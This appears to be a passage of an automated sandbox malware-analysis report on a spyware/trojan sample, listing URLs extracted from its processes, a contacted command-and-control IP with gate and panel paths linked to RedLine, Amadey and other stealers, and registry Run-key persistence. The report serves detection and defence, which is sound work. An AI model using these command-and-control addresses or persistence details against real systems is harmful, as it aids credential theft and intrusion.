                                                        http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002661000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://tempuri.org/Entity/Id13ResponseD2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000027C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://schemas.xmlsoap.org/ws/2004/10/wsat/fault2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://schemas.xmlsoap.org/ws/2004/10/wsat2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://tempuri.org/Entity/Id15Response2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002661000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002753000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsiexplorer.exe, 00000007.00000002.2539158151.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1285013932.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000007.00000003.2159652701.0000000009694000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2161842316.00000000096A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1288613257.00000000095B9000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://api.ip.sb/ipexplorer.exe, 00000007.00000003.1353048341.000000000A4FB000.00000004.00000001.00020000.00000000.sdmp, 2FDD.tmp.ssg.exe, 00000009.00000000.1356438297.0000000000332000.00000002.00000001.01000000.00000006.sdmp, 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmp, 2FDD.tmp.ssg.exe.7.drfalse
                                                                                      		high
                                                                                      http://tempuri.org/Entity/Id1ResponseD2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000007.00000000.1285013932.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader5B34.tmp.zx.exe, 00000010.00000003.1498776616.0000028A025BF000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 00000010.00000003.1498869815.0000028A0261C000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 00000010.00000002.1499598926.0000028A0265A000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 00000010.00000003.1499102662.0000028A0265C000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 00000010.00000003.1496621550.0000028A025EA000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 00000010.00000003.1498943407.0000028A02658000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=2FDD.tmp.ssg.exe, 00000009.00000002.1567668460.000000000369B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA12FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://api.msn.com/v1/news/Feed/Windows?activityId=C2BB6DDCE8D847D6B779FE8AEC27D161&timeOut=5000&ocexplorer.exe, 00000007.00000002.2539158151.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1285013932.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://schemas.datacontract.org/2004/07/System.ServiceModel2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000029A1000.00000004.00000800.00020000.00000000.sdmp, 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://tempuri.org/Entity/Id24Response2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002661000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://www.ecosia.org/newtab/2FDD.tmp.ssg.exe, 00000009.00000002.1567668460.000000000369B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002661000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://crl.micN5B34.tmp.zx.exe, 0000000F.00000003.1466980210.000002271234F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://tempuri.org/Entity/Id21ResponseD2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://schemas.xmlsoap.org/ws/2004/08/addressing2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002661000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svgexplorer.exe, 00000007.00000000.1285013932.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://api.msn.com/$explorer.exe, 00000007.00000002.2543182442.00000000093B4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1287594201.00000000093B4000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://tempuri.org/Entity/Id5Response2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002661000.00000004.00000800.00020000.00000000.sdmp, 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002661000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://tempuri.org/Entity/Id15ResponseD2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000027C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://tempuri.org/Entity/Id10Response2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002661000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/Renew2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://tempuri.org/Entity/Id8Response2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002661000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaTexplorer.exe, 00000007.00000002.2539158151.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1285013932.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            http://schemas.xmlsoap.org/ws/2006/02/addressingidentity2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                http://schemas.microexplorer.exe, 00000007.00000000.1286061430.0000000007B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000002.2541447218.0000000007AF0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000002.2535902251.0000000002C00000.00000002.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svgexplorer.exe, 00000007.00000002.2539158151.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1285013932.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      http://tempuri.org/:hardwares.2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000029A1000.00000004.00000800.00020000.00000000.sdmp, 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          http://tempuri.org/D2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            http://schemas.xmlsoap.org/ws/2004/06/addressingex2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002661000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  http://crl.thawte.com/ThawteTimestampingCA.crl05B34.tmp.zx.exe, 0000000F.00000003.1478082591.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1467567529.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1476279166.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1467805681.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1468347235.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1479405567.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1468690442.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1480543968.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1477346297.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1468185228.000002271234F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.15.dr, _socket.pyd.15.dr, _hashlib.pyd.15.dr, _ctypes.pyd.15.drfalse
                                                                                                                                                                    		high
                                                                                                                                                                    http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ15102FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://powerpoint.office.comcemberZexplorer.exe, 00000007.00000003.2161979179.000000000D048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2550042719.000000000D048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1301437312.000000000CFF4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.1651386271.000000000D048000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        http://tempuri.org/Entity/Id13Response2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002661000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              http://tempuri.org/Entity/Id12ResponseD2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA12FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA12FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002661000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          http://tempuri.org/Entity/Id7ResponseD2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000027C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002661000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://www.google.com/images/branding/product/ico/googleg_lodp.ico2FDD.tmp.ssg.exe, 00000009.00000002.1567668460.000000000369B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  https://www.msn.com/en-us/news/world/ukraine-live-briefing-biden-does-worry-house-drama-will-impact-explorer.exe, 00000007.00000002.2539158151.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1285013932.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002661000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      http://tempuri.org/Entity/Id4ResponseD2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          http://schemas.xmlsoap.org/ws/2002/12/policy2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            http://tempuri.org/Entity/Id22Response2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002661000.00000004.00000800.00020000.00000000.sdmp, 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000027A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		high
                                                                                                                                                                                                              http://tempuri.org/Entity/Id22ResponseD2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000027A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                		high
                                                                                                                                                                                                                http://tempuri.org/Entity/Id16ResponseD2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                  http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                    https://www.msn.com/en-us/news/opinion/decline-of-decorum-21-essential-manners-today-s-parents-fail-explorer.exe, 00000007.00000002.2539158151.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1285013932.0000000006F94000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                      http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        		high

                                                                                                                                                                                                                        World Map of Contacted IPs

                                                                                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                                                                                        • 75% < No. of IPs

                                                                                                                                                                                                                        Public IPs

                                                                                                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                        185.81.68.147
                                                                                                                                                                                                                        		unknownFinland
                                                                                                                                                                                                                        		50108KLNOPT-ASFItrue

                                                                                                                                                                                                                        General Information

                                                                                                                                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                        Analysis ID:1575807
                                                                                                                                                                                                                        Start date and time:2024-12-16 10:41:50 +01:00
                                                                                                                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                        Overall analysis duration:0h 10m 14s
                                                                                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                        Report type:full
                                                                                                                                                                                                                        Cookbook file name:default.jbs
                                                                                                                                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                        Number of analysed new started processes analysed:23
                                                                                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                                                                                        Number of injected processes analysed:1
                                                                                                                                                                                                                        Technologies:
                                                                                                                                                                                                                        • HCA enabled
                                                                                                                                                                                                                        • EGA enabled
                                                                                                                                                                                                                        • AMSI enabled
                                                                                                                                                                                                                        Analysis Mode:default
                                                                                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                                                                                        Sample name:m5804Te9Uw.exe
                                                                                                                                                                                                                        renamed because original name is a hash value
                                                                                                                                                                                                                        Original Sample Name:02701f8d91714c583decdd43635ff407.exe
                                                                                                                                                                                                                        Detection:MAL
                                                                                                                                                                                                                        Classification:mal100.troj.spyw.evad.winEXE@29/57@0/1
                                                                                                                                                                                                                        EGA Information:
                                                                                                                                                                                                                        • Successful, ratio: 100%
                                                                                                                                                                                                                        HCA Information:
                                                                                                                                                                                                                        • Successful, ratio: 68%
                                                                                                                                                                                                                        • Number of executed functions: 194
                                                                                                                                                                                                                        • Number of non-executed functions: 281
                                                                                                                                                                                                                        Cookbook Comments:
                                                                                                                                                                                                                        • Found application associated with file extension: .exe

                                                                                                                                                                                                                        Warnings

                                                                                                                                                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                                        • Excluded IPs from analysis (whitelisted): 13.107.246.63, 20.109.210.53
                                                                                                                                                                                                                        • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                        • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                                                                        • Report size getting too big, too many NtOpenKey calls found.
                                                                                                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                        • VT rate limit hit for: m5804Te9Uw.exe

                                                                                                                                                                                                                        Simulations

                                                                                                                                                                                                                        Behavior and APIs

                                                                                                                                                                                                                        TimeTypeDescription
                                                                                                                                                                                                                        04:42:42API Interceptor8378x Sleep call for process: msiexec.exe modified
                                                                                                                                                                                                                        04:42:42API Interceptor8318x Sleep call for process: audiodg.exe modified
                                                                                                                                                                                                                        04:42:43API Interceptor345448x Sleep call for process: explorer.exe modified
                                                                                                                                                                                                                        04:42:45API Interceptor6832x Sleep call for process: svchost.exe modified
                                                                                                                                                                                                                        04:43:04API Interceptor57x Sleep call for process: 2FDD.tmp.ssg.exe modified
                                                                                                                                                                                                                        10:42:46AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Services C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exe
                                                                                                                                                                                                                        10:42:54AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Services C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exe

                                                                                                                                                                                                                        Joe Sandbox View / Context

                                                                                                                                                                                                                        IPs

                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                        185.81.68.1473Qv3xyyL5G.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                                                        • 185.81.68.147/VzCAHn.php?65D35BAB97073674480464
                                                                                                                                                                                                                        K6qneGSDSB.exeGet hashmaliciousBabadeda, RedLineBrowse
                                                                                                                                                                                                                        • 185.81.68.147/VzCAHn.php?616766F8886C145454191
                                                                                                                                                                                                                        file.exeGet hashmaliciousAmadey, AsyncRAT, HVNC, LummaC Stealer, RedLine, StealcBrowse
                                                                                                                                                                                                                        • 185.81.68.147/tizhyf/gate.php?232B06DEE822786254513
                                                                                                                                                                                                                        mggoBrtk9t.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                                                        • 185.81.68.147/7vhfjke3/index.php
                                                                                                                                                                                                                        D72j5I83wU.dllGet hashmaliciousAmadeyBrowse
                                                                                                                                                                                                                        • 185.81.68.147/7vhfjke3/index.php
                                                                                                                                                                                                                        D72j5I83wU.dllGet hashmaliciousAmadeyBrowse
                                                                                                                                                                                                                        • 185.81.68.147/7vhfjke3/index.php
                                                                                                                                                                                                                        hoPazBDFG9.dllGet hashmaliciousAmadeyBrowse
                                                                                                                                                                                                                        • 185.81.68.147/7vhfjke3/index.php?wal=1
                                                                                                                                                                                                                        tOuVwTJrau.exeGet hashmaliciousAmadeyBrowse
                                                                                                                                                                                                                        • 185.81.68.147/7vhfjke3/index.php
                                                                                                                                                                                                                        yINR7uQlPr.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                                                        • 185.81.68.147/VzCAHn.php?1DC30FADAFF92643095942
                                                                                                                                                                                                                        file.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                                                        • 185.81.68.147/tizhyf/gate.php?0CD020845398340779059

                                                                                                                                                                                                                        Domains

                                                                                                                                                                                                                        No context

                                                                                                                                                                                                                        ASNs

                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                        KLNOPT-ASFI3Qv3xyyL5G.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                                                        • 185.81.68.147
                                                                                                                                                                                                                        K6qneGSDSB.exeGet hashmaliciousBabadeda, RedLineBrowse
                                                                                                                                                                                                                        • 185.81.68.147
                                                                                                                                                                                                                        file.exeGet hashmaliciousAmadey, AsyncRAT, HVNC, LummaC Stealer, RedLine, StealcBrowse
                                                                                                                                                                                                                        • 185.81.68.147
                                                                                                                                                                                                                        mggoBrtk9t.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                                                        • 185.81.68.148
                                                                                                                                                                                                                        D72j5I83wU.dllGet hashmaliciousAmadeyBrowse
                                                                                                                                                                                                                        • 185.81.68.148
                                                                                                                                                                                                                        D72j5I83wU.dllGet hashmaliciousAmadeyBrowse
                                                                                                                                                                                                                        • 185.81.68.148
